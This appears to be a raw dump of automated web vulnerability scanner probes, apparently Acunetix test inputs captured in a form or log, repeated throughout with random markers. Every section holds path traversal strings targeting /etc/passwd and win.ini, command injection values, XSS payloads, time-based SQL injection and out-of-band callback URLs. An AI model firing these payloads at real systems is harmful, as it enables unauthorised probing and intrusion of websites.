
1

1

-1

1<iframe src='data:text/html

cat /etc/passwd

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1

1

../../../../../../../../../../etc/passwd.jpg

`cat /etc/passwd`

-1)

1<body onload=prompt(960284)>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

1

${99183+99381}

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(952427)>

|cat /etc/passwd#

-1))

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n907681=v954761

)

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

j0apDBi0'

'|'ld

1

1<img src=xyz OnErRor=prompt(978473)>

1

1some_inexistent_file_with_long_name%00.jpg

1

1

!(()&&!|*|*|

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

wjDLc8Xg')

1<img/src=">" onerror=alert(959250)>

"|"ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

9Ipb9LPI'))

/etc/passwd

^(#$!@#$)(()))******

1

1

'

'"()

1<ScRiPt%20>prompt(996250)</sCripT>

testasp.vulnweb.com

-1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1&lt

1

"

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'

-1)

1

\xf6<img acu onmouseover=prompt(905729) //\xf6>

1

1

${@print(md5(acunetix_wvs_security_test))}

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1<input autofocus onfocus=prompt(922020)>

1

"

-1))

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

http://hit1Fd41z48TU.bxss.me/

1

${@print(md5(acunetix_wvs_security_test))}\

1

<a href='http://www.acunetix.com'>website security</a>

1

blUxvLx2'

1

||cat /etc/passwd

1

1

acunetix_wvs_invalid_filename

file:///etc/passwd

1

[url=http://www.acunetix.com]website security[/url]

&dir

1

GQUPRfws')

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

'&dir&'

1

comments

/\../\../\../\../\../\../\../etc/passwd

http://www.acunetix.tst

1_gVMnN <ScRiPt >prompt(914883)</ScRiPt>

Nz3sc9ld'))

1

1

1

1

"&dir&"

1

1

WEB-INF/web.xml

comments

1

|dir

1

1'"()&%<ScRiPt >prompt(903223)</ScRiPt>

'"

1

1

1

comments/.

WEB-INF\web.xml

'|dir

1

'"()&%<ScRiPt >prompt(998641)</ScRiPt>

<!--

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1_952561

"|dir

1

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

acu6154\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6154

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1

acux1484\xc0\xbez1\xc0\xbcz2a\x90bcxuca1484

................windowswin.ini

1

1

1

1<ScRiPt >prompt(910772)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<script>prompt(980010)</script>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(915079)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?979346></ScRiPt>

1

1

1

1

1<ScRiPt >prompt(958386)</ScRiPt>

WEB-INF/web.xml

1

response.write(9245682*9860030)

WEB-INF\web.xml

1<video><source onerror="javascript:prompt(924405)">

1

1

'+response.write(9245682*9860030)+'

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(994242)"></g></svg>

1

&cat /etc/passwd&

1

1

"+response.write(9245682*9860030)+"

1

1

1<div style=width:expression(prompt(921449))>

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<iframe src='data:text/html

1

"&cat /etc/passwd&"

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

cat /etc/passwd

1

1<body onload=prompt(961373)>

1

../../../../../../../../../../etc/passwd.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

-1

${99986+100061}

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(924003)>

1

`cat /etc/passwd`

1&n981550=v990012

1some_inexistent_file_with_long_name%00.jpg

-1)

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=xyz OnErRor=prompt(919806)>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

|cat /etc/passwd#

1

1

-1))

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<img/src=">" onerror=alert(981948)>

1

)

1

testasp.vulnweb.com

3KAErJz4'

1

'|'ld

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

!(()&&!|*|*|

1<ScRiPt%20>prompt(954949)</sCripT>

Ap1NAw4s')

/etc/passwd

"|"ld

1

'"()

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1&lt

bTZz3WL2'))

^(#$!@#$)(()))******

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

1

\xf6<img acu onmouseover=prompt(945416) //\xf6>

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'

-1

1

1

1

1<input autofocus onfocus=prompt(996219)>

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

${@print(md5(acunetix_wvs_security_test))}

acunetix_wvs_invalid_filename

http://hitkWOJte6y7G.bxss.me/

1

-1)

"

<a href='http://www.acunetix.com'>website security</a>

${@print(md5(acunetix_wvs_security_test))}\

1

1

comments

||cat /etc/passwd

[url=http://www.acunetix.com]website security[/url]

-1))

1

1

file:///etc/passwd

1

comments

1

&dir

1_R9FGa <ScRiPt >prompt(954086)</ScRiPt>

1

comments/.

/\../\../\../\../\../\../\../etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

2jIfg92Y'

'"

http://www.acunetix.tst

1

1

'&dir&'

1

1

A68sQEt0')

<!--

1

WEB-INF/web.xml

1

1

"&dir&"

1

1

1

l0Y6DGAK'))

|dir

WEB-INF\web.xml

1'"()&%<ScRiPt >prompt(906399)</ScRiPt>

1

1

1

1

1

1

'|dir

1

'"()&%<ScRiPt >prompt(968587)</ScRiPt>

1

../../../../../../../../../../windows/win.ini

1

1

1

"|dir

../../../../../../../../../../boot.ini

1

1_983435

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

acu4544\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4544

1

1

1

................windowswin.ini

acux8349\xc0\xbez1\xc0\xbcz2a\x90bcxuca8349

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(903278)</ScRiPt>

1

1

1

1<script>prompt(905681)</script>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(965269)</ScRiPt>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?950606></ScRiPt>

1

1

1<ScRiPt >prompt(918349)</ScRiPt>

1

1

WEB-INF/web.xml

1<video><source onerror="javascript:prompt(982061)">

&cat /etc/passwd&

1

response.write(9342377*9602493)

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(906095)"></g></svg>

WEB-INF\web.xml

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

'+response.write(9342377*9602493)+'

1

"&cat /etc/passwd&"

1

1<div style=width:expression(prompt(956983))>

../../../../../../../../../../etc/passwd

1

cat /etc/passwd

"+response.write(9342377*9602493)+"

1

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<iframe src='data:text/html

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

`cat /etc/passwd`

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

../../../../../../../../../../etc/passwd.jpg

|cat /etc/passwd#

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1<body onload=prompt(963637)>

1

${99507+99626}

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

'|'ld

-1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(952523)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

-1)

1

1

"|"ld

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1&n989109=v994201

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<img src=xyz OnErRor=prompt(925197)>

1

-1))

1

1some_inexistent_file_with_long_name%00.jpg

)

1

1<img/src=">" onerror=alert(931035)>

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

399rGhCS'

1

!(()&&!|*|*|

'"()

'

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'

/etc/passwd

4977rinG')

1

1<ScRiPt%20>prompt(913230)</sCripT>

1

^(#$!@#$)(()))******

testasp.vulnweb.com

"

"

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

iiXT4sFr'))

1

1

1&lt

1

${@print(md5(acunetix_wvs_security_test))}

1

-1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

||cat /etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

\xf6<img acu onmouseover=prompt(930487) //\xf6>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1)

&dir

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

1

-1))

1<input autofocus onfocus=prompt(945269)>

1

1

'&dir&'

4hdDJQIu'

1

acunetix_wvs_invalid_filename

http://hitJ5f0x9CkhM.bxss.me/

1

"&dir&"

1

<a href='http://www.acunetix.com'>website security</a>

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

Jl51NTTs')

1

file:///etc/passwd

1

comments

|dir

WHHEFXDd'))

1

[url=http://www.acunetix.com]website security[/url]

1

1

comments

1

'|dir

http://www.acunetix.tst

/\../\../\../\../\../\../\../etc/passwd

1

1

1_bb4wQ <ScRiPt >prompt(938318)</ScRiPt>

1'"()&%<ScRiPt >prompt(977186)</ScRiPt>

'"

comments/.

1

1

1

WEB-INF/web.xml

"|dir

1

1

<!--

1

'"()&%<ScRiPt >prompt(975807)</ScRiPt>

1

1

WEB-INF\web.xml

1

1_923772

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

1

acu4433\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4433

1

../../../../../../../../../../boot.ini

1

1

acux1083\xc0\xbez1\xc0\xbcz2a\x90bcxuca1083

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

1<ScRiPt >prompt(996302)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

................windowswin.ini

1

1<script>prompt(992536)</script>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(917480)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?976223></ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt >prompt(951206)</ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<video><source onerror="javascript:prompt(968919)">

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(964021)"></g></svg>

response.write(9001720*9656800)

1

1

1

WEB-INF/web.xml

1<div style=width:expression(prompt(967564))>

'+response.write(9001720*9656800)+'

1

1

&cat /etc/passwd&

1<iframe src='data:text/html

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

WEB-INF\web.xml

"+response.write(9001720*9656800)+"

1

1

'&cat /etc/passwd&'

1<body onload=prompt(994869)>

1

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(938612)>

"&cat /etc/passwd&"

1

1

-1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

-1)

1

1

cat /etc/passwd

1<img src=xyz OnErRor=prompt(975207)>

1

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd.jpg

-1))

${99448+99824}

`cat /etc/passwd`

1

1

1<img/src=">" onerror=alert(950864)>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

hTMacJ8n'

1

|cat /etc/passwd#

1

1some_inexistent_file_with_long_name%00.jpg

)

1&n994300=v964514

1<ScRiPt%20>prompt(956415)</sCripT>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

m53k9WqU')

'|'ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1&lt

1

'"()

^(#$!@#$)(()))******

testasp.vulnweb.com

"|"ld

8CfCouQ2'))

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

\xf6<img acu onmouseover=prompt(986335) //\xf6>

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

-1

/etc/passwd

1

1

'

1

1

1

1<input autofocus onfocus=prompt(971698)>

-1)

"

1

1

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

http://hitLUvADkwz2I.bxss.me/

<a href='http://www.acunetix.com'>website security</a>

1

-1))

1

${@print(md5(acunetix_wvs_security_test))}

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

acunetix_wvs_invalid_filename

1

${@print(md5(acunetix_wvs_security_test))}\

1

pDthzgS2'

1

[url=http://www.acunetix.com]website security[/url]

1

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

||cat /etc/passwd

1

http://www.acunetix.tst

MZGvm73C')

1

1

1_H5RiM <ScRiPt >prompt(945686)</ScRiPt>

comments

1

1

&dir

1

1

LE9jRWb8'))

1

'"

comments/.

1'"()&%<ScRiPt >prompt(922158)</ScRiPt>

1

'&dir&'

file:///etc/passwd

1

1

1

1

<!--

1

'"()&%<ScRiPt >prompt(981161)</ScRiPt>

"&dir&"

1

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1_957629

|dir

1

1

1

1

1

acu6037\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6037

'|dir

WEB-INF/web.xml

1

1

1

"|dir

acux7784\xc0\xbez1\xc0\xbcz2a\x90bcxuca7784

1

WEB-INF\web.xml

1

1

1

1<ScRiPt >prompt(978686)</ScRiPt>

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1<script>prompt(955054)</script>

1

1

1

1

1<ScRiPt >prompt(922846)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?936730></ScRiPt>

1

1

1

................windowswin.ini

1<ScRiPt >prompt(974004)</ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<video><source onerror="javascript:prompt(922793)">

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(993807)"></g></svg>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

response.write(9056005*9790362)

1

1

1<div style=width:expression(prompt(999428))>

&cat /etc/passwd&

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

'+response.write(9056005*9790362)+'

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<iframe src='data:text/html

'&cat /etc/passwd&'

"+response.write(9056005*9790362)+"

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(996094)>

"&cat /etc/passwd&"

WEB-INF/web.xml

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

cat /etc/passwd

WEB-INF\web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(911230)>

1

1

1

../../../../../../../../../../etc/passwd

-1

1

1

1

1<img src=xyz OnErRor=prompt(979611)>

1

`cat /etc/passwd`

1

-1)

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

${100191+99708}

1

-1))

1

1

1<img/src=">" onerror=alert(978261)>

|cat /etc/passwd#

A4wIpeas'

1

../../../../../../../../../../etc/passwd.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n915704=v960479

'|'ld

1

1

1<ScRiPt%20>prompt(939917)</sCripT>

YBCgfmjv')

1some_inexistent_file_with_long_name%00.jpg

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

)

1

szH5zBpC'))

1

1&lt

"|"ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

-1

testasp.vulnweb.com

\xf6<img acu onmouseover=prompt(989642) //\xf6>

1

^(#$!@#$)(()))******

-1)

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

/../..//../..//../..//../..//../..//etc/passwd.jpg

'"()

'

1<input autofocus onfocus=prompt(999809)>

1

1

-1))

1

1

1

"

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"

<a href='http://www.acunetix.com'>website security</a>

1

1

Z1hWLhxp'

1

1

1

/etc/passwd

[url=http://www.acunetix.com]website security[/url]

${@print(md5(acunetix_wvs_security_test))}

||cat /etc/passwd

acunetix_wvs_invalid_filename

1

1

http://hitWczTCKmh2W.bxss.me/

VSj5tQZs')

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1_b94Gy <ScRiPt >prompt(908476)</ScRiPt>

1

comments

&dir

${@print(md5(acunetix_wvs_security_test))}\

1

1

6VN0wCyq'))

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

'&dir&'

1

comments

1

1

1

http://www.acunetix.tst

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

'"

"&dir&"

1

1

1

comments/.

1

|dir

<!--

1

1

1'"()&%<ScRiPt >prompt(989116)</ScRiPt>

1

1

1

'|dir

'"()&%<ScRiPt >prompt(981637)</ScRiPt>

file:///etc/passwd

1

1

"|dir

1

1

1

1

1

1_996557

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

1

WEB-INF/web.xml

acu5527\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5527

1

1

WEB-INF\web.xml

1

1

1

1

acux5950\xc0\xbez1\xc0\xbcz2a\x90bcxuca5950

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

1<ScRiPt >prompt(946177)</ScRiPt>

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1<script>prompt(930730)</script>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(905747)</ScRiPt>

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?957568></ScRiPt>

................windowswin.ini

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(928907)</ScRiPt>

1

response.write(9839515*9912905)

1

1

1<video><source onerror="javascript:prompt(973806)">

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

'+response.write(9839515*9912905)+'

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(973798)"></g></svg>

1

&cat /etc/passwd&

1

1

1<div style=width:expression(prompt(937101))>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

"+response.write(9839515*9912905)+"

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

../../../../../../../../../../etc/passwd

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<iframe src='data:text/html

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

1

SomeCustomInjectedHeader:injected_by_wvs

-1

1<body onload=prompt(927050)>

1

1

1

WEB-INF/web.xml

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(900775)>

1

-1)

1

WEB-INF\web.xml

1

`cat /etc/passwd`

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1<img src=xyz OnErRor=prompt(973096)>

${99673+99860}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

|cat /etc/passwd#

1

1

-1))

1

1

1some_inexistent_file_with_long_name%00.jpg

1<img/src=">" onerror=alert(956461)>

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

0oDooSxp'

)

1&n988834=v920437

'|'ld

1

1<ScRiPt%20>prompt(951263)</sCripT>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

ARIVK6hK')

"|"ld

1

1

!(()&&!|*|*|

'

1&lt

eQvVUhU7'))

testasp.vulnweb.com

'"()

/etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

^(#$!@#$)(()))******

\xf6<img acu onmouseover=prompt(929413) //\xf6>

"

1

-1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'

1

1

-1)

${@print(md5(acunetix_wvs_security_test))}

1<input autofocus onfocus=prompt(926175)>

1

1

1

1

"

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1))

1

acunetix_wvs_invalid_filename

<a href='http://www.acunetix.com'>website security</a>

http://hitCyaEFoctjz.bxss.me/

${@print(md5(acunetix_wvs_security_test))}\

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

JDll39A1'

1

||cat /etc/passwd

1

comments

vxVg73D1')

1

[url=http://www.acunetix.com]website security[/url]

1

1

comments

&dir

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

89KNPsm3'))

comments/.

1_l8i9L <ScRiPt >prompt(968211)</ScRiPt>

file:///etc/passwd

http://www.acunetix.tst

1

1

1

1

1

'&dir&'

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

'"

1

"&dir&"

1'"()&%<ScRiPt >prompt(917971)</ScRiPt>

1

1

<!--

1

1

WEB-INF/web.xml

|dir

'"()&%<ScRiPt >prompt(921560)</ScRiPt>

1

1

1

1

'|dir

1

WEB-INF\web.xml

1

1

1

1

1_936883

"|dir

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

1

acu2390\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2390

../../../../../../../../../../boot.ini

1

1

1

acux6757\xc0\xbez1\xc0\xbcz2a\x90bcxuca6757

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<ScRiPt >prompt(920786)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

................windowswin.ini

1

1<script>prompt(933426)</script>

1

1

1<ScRiPt >prompt(985230)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?997242></ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(948492)</ScRiPt>

1

1

response.write(9720025*9664803)

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<video><source onerror="javascript:prompt(989653)">

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

'+response.write(9720025*9664803)+'

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(901432)"></g></svg>

1

"+response.write(9720025*9664803)+"

&cat /etc/passwd&

1

WEB-INF/web.xml

1<div style=width:expression(prompt(928937))>

1

WEB-INF\web.xml

'&cat /etc/passwd&'

1

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

